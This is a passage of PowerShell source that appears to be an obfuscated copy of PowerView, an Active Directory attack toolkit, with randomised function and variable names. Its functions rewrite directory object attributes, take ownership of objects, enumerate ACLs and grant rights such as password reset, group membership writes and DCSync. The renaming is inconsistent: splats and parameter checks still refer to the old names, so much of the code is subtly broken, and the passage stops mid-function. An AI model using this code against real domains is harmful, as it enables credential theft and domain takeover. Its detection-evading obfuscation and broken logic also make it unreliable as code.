$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{'Raw' = $True} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['LDAPFilter']) { $ufgcNRNN99['LDAPFilter'] = $hzaXgjDv99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
} | |
PROCESS { | |
if ($PSBoundParameters['Identity']) { $ufgcNRNN99['Identity'] = $mxWgOMSt99 } | |
$uvkBGEGr99 = sniffling @SearcherArguments | |
ForEach ($Object in $uvkBGEGr99) { | |
$Entry = $uvkBGEGr99.GetDirectoryEntry() | |
if($PSBoundParameters['Set']) { | |
try { | |
$PSBoundParameters['Set'].GetEnumerator() | ForEach-Object { | |
Write-Verbose "[sleepiest] Setting '$($_.Name)' to '$($_.Value)' for object '$($uvkBGEGr99.Properties.samaccountname)'" | |
$Entry.put($_.Name, $_.Value) | |
} | |
$Entry.commitchanges() | |
} | |
catch { | |
Write-Warning "[sleepiest] Error setting/replacing properties for object '$($uvkBGEGr99.Properties.samaccountname)' : $_" | |
} | |
} | |
if($PSBoundParameters['XOR']) { | |
try { | |
$PSBoundParameters['XOR'].GetEnumerator() | ForEach-Object { | |
$pHItXvTL99 = $_.Name | |
$bTWOSVaC99 = $_.Value | |
Write-Verbose "[sleepiest] XORing '$pHItXvTL99' with '$bTWOSVaC99' for object '$($uvkBGEGr99.Properties.samaccountname)'" | |
$JQLpnhgi99 = $Entry.$pHItXvTL99[0].GetType().name | |
$fqSsECDw99 = $($Entry.$pHItXvTL99) -bxor $bTWOSVaC99 | |
$Entry.$pHItXvTL99 = $fqSsECDw99 -as $JQLpnhgi99 | |
} | |
$Entry.commitchanges() | |
} | |
catch { | |
Write-Warning "[sleepiest] Error XOR'ing properties for object '$($uvkBGEGr99.Properties.samaccountname)' : $_" | |
} | |
} | |
if($PSBoundParameters['Clear']) { | |
try { | |
$PSBoundParameters['Clear'] | ForEach-Object { | |
$pHItXvTL99 = $_ | |
Write-Verbose "[sleepiest] Clearing '$pHItXvTL99' for object '$($uvkBGEGr99.Properties.samaccountname)'" | |
$Entry.$pHItXvTL99.clear() | |
} | |
$Entry.commitchanges() | |
} | |
catch { | |
Write-Warning "[sleepiest] Error clearing properties for object '$($uvkBGEGr99.Properties.samaccountname)' : $_" | |
} | |
} | |
} | |
} | |
} | |
function prisoner { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.LogonHours')] | |
[CmdletBinding()] | |
Param ( | |
[Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[ValidateNotNullOrEmpty()] | |
[byte[]] | |
$LSgQnWco99 | |
) | |
Begin { | |
if($LSgQnWco99.Count -ne 21) { | |
throw "LogonHoursArray is the incorrect length" | |
} | |
function slowly { | |
Param ( | |
[int[]] | |
$YoYvVciF99 | |
) | |
$OQSzkOdU99 = New-Object bool[] 24 | |
for($i=0; $i -lt 3; $i++) { | |
$Byte = $YoYvVciF99[$i] | |
$iSpjhTbK99 = $i * 8 | |
$Str = [Convert]::ToString($Byte,2).PadLeft(8,'0') | |
$OQSzkOdU99[$iSpjhTbK99+0] = [bool] [convert]::ToInt32([string]$Str[7]) | |
$OQSzkOdU99[$iSpjhTbK99+1] = [bool] [convert]::ToInt32([string]$Str[6]) | |
$OQSzkOdU99[$iSpjhTbK99+2] = [bool] [convert]::ToInt32([string]$Str[5]) | |
$OQSzkOdU99[$iSpjhTbK99+3] = [bool] [convert]::ToInt32([string]$Str[4]) | |
$OQSzkOdU99[$iSpjhTbK99+4] = [bool] [convert]::ToInt32([string]$Str[3]) | |
$OQSzkOdU99[$iSpjhTbK99+5] = [bool] [convert]::ToInt32([string]$Str[2]) | |
$OQSzkOdU99[$iSpjhTbK99+6] = [bool] [convert]::ToInt32([string]$Str[1]) | |
$OQSzkOdU99[$iSpjhTbK99+7] = [bool] [convert]::ToInt32([string]$Str[0]) | |
} | |
$OQSzkOdU99 | |
} | |
} | |
Process { | |
$ySjxeOag99 = @{ | |
Sunday = slowly -YoYvVciF99 $LSgQnWco99[0..2] | |
Monday = slowly -YoYvVciF99 $LSgQnWco99[3..5] | |
Tuesday = slowly -YoYvVciF99 $LSgQnWco99[6..8] | |
Wednesday = slowly -YoYvVciF99 $LSgQnWco99[9..11] | |
Thurs = slowly -YoYvVciF99 $LSgQnWco99[12..14] | |
Friday = slowly -YoYvVciF99 $LSgQnWco99[15..17] | |
Saturday = slowly -YoYvVciF99 $LSgQnWco99[18..20] | |
} | |
$ySjxeOag99 = New-Object PSObject -Property $ySjxeOag99 | |
$ySjxeOag99.PSObject.TypeNames.Insert(0, 'PowerView.LogonHours') | |
$ySjxeOag99 | |
} | |
} | |
function bugs { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('System.Security.AccessControl.AuthorizationRule')] | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True, Mandatory = $True)] | |
[Alias('DistinguishedName', 'SamAccountName', 'Name')] | |
[String] | |
$gNyvWtjE99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$iKYisJVQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[Parameter(Mandatory = $True)] | |
[ValidateSet('AccessSystemSecurity', 'CreateChild','Delete','DeleteChild','DeleteTree','ExtendedRight','GenericAll','GenericExecute','GenericRead','GenericWrite','ListChildren','ListObject','ReadControl','ReadProperty','Self','Synchronize','WriteDacl','WriteOwner','WriteProperty')] | |
$Right, | |
[Parameter(Mandatory = $True, ParameterSetName='AccessRuleType')] | |
[ValidateSet('Allow', 'Deny')] | |
[String[]] | |
$wTRaMSiC99, | |
[Parameter(Mandatory = $True, ParameterSetName='AuditRuleType')] | |
[ValidateSet('Success', 'Failure')] | |
[String] | |
$DmcEQRbd99, | |
[Parameter(Mandatory = $False, ParameterSetName='AccessRuleType')] | |
[Parameter(Mandatory = $False, ParameterSetName='AuditRuleType')] | |
[Parameter(Mandatory = $False, ParameterSetName='ObjectGuidLookup')] | |
[Guid] | |
$RIdHmlOt99, | |
[ValidateSet('All', 'Children','Descendents','None','SelfAndChildren')] | |
[String] | |
$JnqKNagc99, | |
[Guid] | |
$vMOOwmXc99 | |
) | |
Begin { | |
if ($gNyvWtjE99 -notmatch '^S-1-.*') { | |
$zMGdzapz99 = @{ | |
'Identity' = $gNyvWtjE99 | |
'Properties' = 'distinguishedname,objectsid' | |
} | |
if ($PSBoundParameters['PrincipalDomain']) { $zMGdzapz99['Domain'] = $iKYisJVQ99 } | |
if ($PSBoundParameters['Server']) { $zMGdzapz99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $zMGdzapz99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $zMGdzapz99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $zMGdzapz99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $zMGdzapz99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $zMGdzapz99['Credential'] = $KWcDeQDF99 } | |
$ctJzMZFY99 = sniffling @PrincipalSearcherArguments | |
if (-not $ctJzMZFY99) { | |
throw "Unable to resolve principal: $gNyvWtjE99" | |
} | |
elseif($ctJzMZFY99.Count -gt 1) { | |
throw "PrincipalIdentity matches multiple AD objects, but only one is allowed" | |
} | |
$DHIjlbmp99 = $ctJzMZFY99.objectsid | |
} | |
else { | |
$DHIjlbmp99 = $gNyvWtjE99 | |
} | |
$IvrKLoIq99 = 0 | |
foreach($r in $Right) { | |
$IvrKLoIq99 = $IvrKLoIq99 -bor (([System.DirectoryServices.ActiveDirectoryRights]$r).value__) | |
} | |
$IvrKLoIq99 = [System.DirectoryServices.ActiveDirectoryRights]$IvrKLoIq99 | |
$mxWgOMSt99 = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$DHIjlbmp99) | |
} | |
Process { | |
if($PSCmdlet.ParameterSetName -eq 'AuditRuleType') { | |
if($RIdHmlOt99 -eq $null -and $JnqKNagc99 -eq [String]::Empty -and $vMOOwmXc99 -eq $null) { | |
New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $mxWgOMSt99, $IvrKLoIq99, $DmcEQRbd99 | |
} elseif($RIdHmlOt99 -eq $null -and $JnqKNagc99 -ne [String]::Empty -and $vMOOwmXc99 -eq $null) { | |
New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $mxWgOMSt99, $IvrKLoIq99, $DmcEQRbd99, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$JnqKNagc99) | |
} elseif($RIdHmlOt99 -eq $null -and $JnqKNagc99 -ne [String]::Empty -and $vMOOwmXc99 -ne $null) { | |
New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $mxWgOMSt99, $IvrKLoIq99, $DmcEQRbd99, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$JnqKNagc99), $vMOOwmXc99 | |
} elseif($RIdHmlOt99 -ne $null -and $JnqKNagc99 -eq [String]::Empty -and $vMOOwmXc99 -eq $null) { | |
New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $mxWgOMSt99, $IvrKLoIq99, $DmcEQRbd99, $RIdHmlOt99 | |
} elseif($RIdHmlOt99 -ne $null -and $JnqKNagc99 -ne [String]::Empty -and $vMOOwmXc99 -eq $null) { | |
New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $mxWgOMSt99, $IvrKLoIq99, $DmcEQRbd99, $RIdHmlOt99, $JnqKNagc99 | |
} elseif($RIdHmlOt99 -ne $null -and $JnqKNagc99 -ne [String]::Empty -and $vMOOwmXc99 -ne $null) { | |
New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $mxWgOMSt99, $IvrKLoIq99, $DmcEQRbd99, $RIdHmlOt99, $JnqKNagc99, $vMOOwmXc99 | |
} | |
} | |
else { | |
if($RIdHmlOt99 -eq $null -and $JnqKNagc99 -eq [String]::Empty -and $vMOOwmXc99 -eq $null) { | |
New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $mxWgOMSt99, $IvrKLoIq99, $wTRaMSiC99 | |
} elseif($RIdHmlOt99 -eq $null -and $JnqKNagc99 -ne [String]::Empty -and $vMOOwmXc99 -eq $null) { | |
New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $mxWgOMSt99, $IvrKLoIq99, $wTRaMSiC99, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$JnqKNagc99) | |
} elseif($RIdHmlOt99 -eq $null -and $JnqKNagc99 -ne [String]::Empty -and $vMOOwmXc99 -ne $null) { | |
New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $mxWgOMSt99, $IvrKLoIq99, $wTRaMSiC99, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$JnqKNagc99), $vMOOwmXc99 | |
} elseif($RIdHmlOt99 -ne $null -and $JnqKNagc99 -eq [String]::Empty -and $vMOOwmXc99 -eq $null) { | |
New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $mxWgOMSt99, $IvrKLoIq99, $wTRaMSiC99, $RIdHmlOt99 | |
} elseif($RIdHmlOt99 -ne $null -and $JnqKNagc99 -ne [String]::Empty -and $vMOOwmXc99 -eq $null) { | |
New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $mxWgOMSt99, $IvrKLoIq99, $wTRaMSiC99, $RIdHmlOt99, $JnqKNagc99 | |
} elseif($RIdHmlOt99 -ne $null -and $JnqKNagc99 -ne [String]::Empty -and $vMOOwmXc99 -ne $null) { | |
New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $mxWgOMSt99, $IvrKLoIq99, $wTRaMSiC99, $RIdHmlOt99, $JnqKNagc99, $vMOOwmXc99 | |
} | |
} | |
} | |
} | |
function sailings { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DistinguishedName', 'SamAccountName', 'Name')] | |
[String] | |
$mxWgOMSt99, | |
[Parameter(Mandatory = $True)] | |
[ValidateNotNullOrEmpty()] | |
[Alias('Owner')] | |
[String] | |
$QuggjzOs99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['LDAPFilter']) { $ufgcNRNN99['LDAPFilter'] = $hzaXgjDv99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
$fNFsULsz99 = sniffling @SearcherArguments -mxWgOMSt99 $QuggjzOs99 -nmZxBYze99 objectsid | Select-Object -ExpandProperty objectsid | |
if ($fNFsULsz99) { | |
$WRvvAlAh99 = [System.Security.Principal.SecurityIdentifier]$fNFsULsz99 | |
} | |
else { | |
Write-Warning "[sailings] Error parsing owner identity '$QuggjzOs99'" | |
} | |
} | |
PROCESS { | |
if ($WRvvAlAh99) { | |
$ufgcNRNN99['Raw'] = $True | |
$ufgcNRNN99['Identity'] = $mxWgOMSt99 | |
$uvkBGEGr99 = sniffling @SearcherArguments | |
ForEach ($Object in $uvkBGEGr99) { | |
try { | |
Write-Verbose "[sailings] Attempting to set the owner for '$mxWgOMSt99' to '$QuggjzOs99'" | |
$Entry = $uvkBGEGr99.GetDirectoryEntry() | |
$Entry.PsBase.Options.SecurityMasks = 'Owner' | |
$Entry.PsBase.ObjectSecurity.SetOwner($WRvvAlAh99) | |
$Entry.PsBase.CommitChanges() | |
} | |
catch { | |
Write-Warning "[sailings] Error setting owner: $_" | |
} | |
} | |
} | |
} | |
} | |
function hatch { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.ACL')] | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DistinguishedName', 'SamAccountName', 'Name')] | |
[String[]] | |
$mxWgOMSt99, | |
[Switch] | |
$Sacl, | |
[Switch] | |
$RPwTouXm99, | |
[String] | |
[Alias('Rights')] | |
[ValidateSet('All', 'ResetPassword', 'WriteMembers')] | |
$WCHIsHfL99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{ | |
'Properties' = 'samaccountname,ntsecuritydescriptor,distinguishedname,objectsid' | |
} | |
if ($PSBoundParameters['Sacl']) { | |
$ufgcNRNN99['SecurityMasks'] = 'Sacl' | |
} | |
else { | |
$ufgcNRNN99['SecurityMasks'] = 'Dacl' | |
} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
$HXTNsuXQ99 = Richelieu @SearcherArguments | |
$YvkXiIUw99 = @{} | |
if ($PSBoundParameters['Domain']) { $YvkXiIUw99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Server']) { $YvkXiIUw99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['ResultPageSize']) { $YvkXiIUw99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $YvkXiIUw99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Credential']) { $YvkXiIUw99['Credential'] = $KWcDeQDF99 } | |
if ($PSBoundParameters['ResolveGUIDs']) { | |
$GUIDs = Carmine @DomainGUIDMapArguments | |
} | |
} | |
PROCESS { | |
if ($HXTNsuXQ99) { | |
$btfCLlYC99 = '' | |
$IUDzHsEr99 = '' | |
$mxWgOMSt99 | Where-Object {$_} | ForEach-Object { | |
$KzBFOtcK99 = $_.Replace('(', '\28').Replace(')', '\29') | |
if ($KzBFOtcK99 -match '^S-1-.*') { | |
$btfCLlYC99 += "(objectsid=$KzBFOtcK99)" | |
} | |
elseif ($KzBFOtcK99 -match '^(CN|OU|DC)=.*') { | |
$btfCLlYC99 += "(distinguishedname=$KzBFOtcK99)" | |
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { | |
$wXLTskQJ99 = $KzBFOtcK99.SubString($KzBFOtcK99.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
Write-Verbose "[hatch] Extracted domain '$wXLTskQJ99' from '$KzBFOtcK99'" | |
$ufgcNRNN99['Domain'] = $wXLTskQJ99 | |
$HXTNsuXQ99 = Richelieu @SearcherArguments | |
if (-not $HXTNsuXQ99) { | |
Write-Warning "[hatch] Unable to retrieve domain searcher for '$wXLTskQJ99'" | |
} | |
} | |
} | |
elseif ($KzBFOtcK99 -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { | |
$jjIYltxr99 = (([Guid]$KzBFOtcK99).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' | |
$btfCLlYC99 += "(objectguid=$jjIYltxr99)" | |
} | |
elseif ($KzBFOtcK99.Contains('.')) { | |
$btfCLlYC99 += "(|(samAccountName=$KzBFOtcK99)(name=$KzBFOtcK99)(dnshostname=$KzBFOtcK99))" | |
} | |
else { | |
$btfCLlYC99 += "(|(samAccountName=$KzBFOtcK99)(name=$KzBFOtcK99)(displayname=$KzBFOtcK99))" | |
} | |
} | |
if ($btfCLlYC99 -and ($btfCLlYC99.Trim() -ne '') ) { | |
$IUDzHsEr99 += "(|$btfCLlYC99)" | |
} | |
if ($PSBoundParameters['LDAPFilter']) { | |
Write-Verbose "[hatch] Using additional LDAP filter: $hzaXgjDv99" | |
$IUDzHsEr99 += "$hzaXgjDv99" | |
} | |
if ($IUDzHsEr99) { | |
$HXTNsuXQ99.filter = "(&$IUDzHsEr99)" | |
} | |
Write-Verbose "[hatch] hatch filter string: $($HXTNsuXQ99.filter)" | |
$hCEVDJUr99 = $HXTNsuXQ99.FindAll() | |
$hCEVDJUr99 | Where-Object {$_} | ForEach-Object { | |
$Object = $_.Properties | |
if ($Object.objectsid -and $Object.objectsid[0]) { | |
$DHIjlbmp99 = (New-Object System.Security.Principal.SecurityIdentifier($Object.objectsid[0],0)).Value | |
} | |
else { | |
$DHIjlbmp99 = $Null | |
} | |
try { | |
New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Object['ntsecuritydescriptor'][0], 0 | ForEach-Object { if ($PSBoundParameters['Sacl']) {$_.SystemAcl} else {$_.DiscretionaryAcl} } | ForEach-Object { | |
if ($PSBoundParameters['RightsFilter']) { | |
$KwEQkGTv99 = Switch ($WCHIsHfL99) { | |
'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' } | |
'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' } | |
Default { '00000000-0000-0000-0000-000000000000' } | |
} | |
if ($_.ObjectType -eq $KwEQkGTv99) { | |
$_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0] | |
$_ | Add-Member NoteProperty 'ObjectSID' $DHIjlbmp99 | |
$sZmszjpm99 = $True | |
} | |
} | |
else { | |
$_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0] | |
$_ | Add-Member NoteProperty 'ObjectSID' $DHIjlbmp99 | |
$sZmszjpm99 = $True | |
} | |
if ($sZmszjpm99) { | |
$_ | Add-Member NoteProperty 'ActiveDirectoryRights' ([Enum]::ToObject([System.DirectoryServices.ActiveDirectoryRights], $_.AccessMask)) | |
if ($GUIDs) { | |
$RsVCMInp99 = @{} | |
$_.psobject.properties | ForEach-Object { | |
if ($_.Name -match 'ObjectType|InheritedObjectType|ObjectAceType|InheritedObjectAceType') { | |
try { | |
$RsVCMInp99[$_.Name] = $GUIDs[$_.Value.toString()] | |
} | |
catch { | |
$RsVCMInp99[$_.Name] = $_.Value | |
} | |
} | |
else { | |
$RsVCMInp99[$_.Name] = $_.Value | |
} | |
} | |
$ARDWWJFs99 = New-Object -TypeName PSObject -Property $RsVCMInp99 | |
$ARDWWJFs99.PSObject.TypeNames.Insert(0, 'PowerView.ACL') | |
$ARDWWJFs99 | |
} | |
else { | |
$_.PSObject.TypeNames.Insert(0, 'PowerView.ACL') | |
$_ | |
} | |
} | |
} | |
} | |
catch { | |
Write-Verbose "[hatch] Error: $_" | |
} | |
} | |
} | |
} | |
} | |
function enchant { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DistinguishedName', 'SamAccountName', 'Name')] | |
[String[]] | |
$OLwIZxWj99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ShZaeqLs99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$EyPPBjzO99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$QrFNsnQt99, | |
[Parameter(Mandatory = $True)] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$gNyvWtjE99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$iKYisJVQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[ValidateSet('All', 'ResetPassword', 'WriteMembers', 'DCSync')] | |
[String] | |
$DQsrHUMr99 = 'All', | |
[Guid] | |
$BgWfrqAx99 | |
) | |
BEGIN { | |
$SbiFercq99 = @{ | |
'Properties' = 'distinguishedname' | |
'Raw' = $True | |
} | |
if ($PSBoundParameters['TargetDomain']) { $SbiFercq99['Domain'] = $ShZaeqLs99 } | |
if ($PSBoundParameters['TargetLDAPFilter']) { $SbiFercq99['LDAPFilter'] = $EyPPBjzO99 } | |
if ($PSBoundParameters['TargetSearchBase']) { $SbiFercq99['SearchBase'] = $QrFNsnQt99 } | |
if ($PSBoundParameters['Server']) { $SbiFercq99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $SbiFercq99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $SbiFercq99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $SbiFercq99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $SbiFercq99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $SbiFercq99['Credential'] = $KWcDeQDF99 } | |
$zMGdzapz99 = @{ | |
'Identity' = $gNyvWtjE99 | |
'Properties' = 'distinguishedname,objectsid' | |
} | |
if ($PSBoundParameters['PrincipalDomain']) { $zMGdzapz99['Domain'] = $iKYisJVQ99 } | |
if ($PSBoundParameters['Server']) { $zMGdzapz99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $zMGdzapz99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $zMGdzapz99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $zMGdzapz99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $zMGdzapz99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $zMGdzapz99['Credential'] = $KWcDeQDF99 } | |
$LlCCFCeG99 = sniffling @PrincipalSearcherArguments | |
if (-not $LlCCFCeG99) { | |
throw "Unable to resolve principal: $gNyvWtjE99" | |
} | |
} | |
PROCESS { | |
$SbiFercq99['Identity'] = $OLwIZxWj99 | |
$jFmDhuwP99 = sniffling @TargetSearcherArguments | |
ForEach ($BOGxsDDD99 in $jFmDhuwP99) { | |
$JnqKNagc99 = [System.DirectoryServices.ActiveDirectorySecurityInheritance] 'None' | |
$EgtRgneQ99 = [System.Security.AccessControl.AccessControlType] 'Allow' | |
$ACEs = @() | |
if ($BgWfrqAx99) { | |
$GUIDs = @($BgWfrqAx99) | |
} | |
else { | |
$GUIDs = Switch ($DQsrHUMr99) { | |
'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' } | |
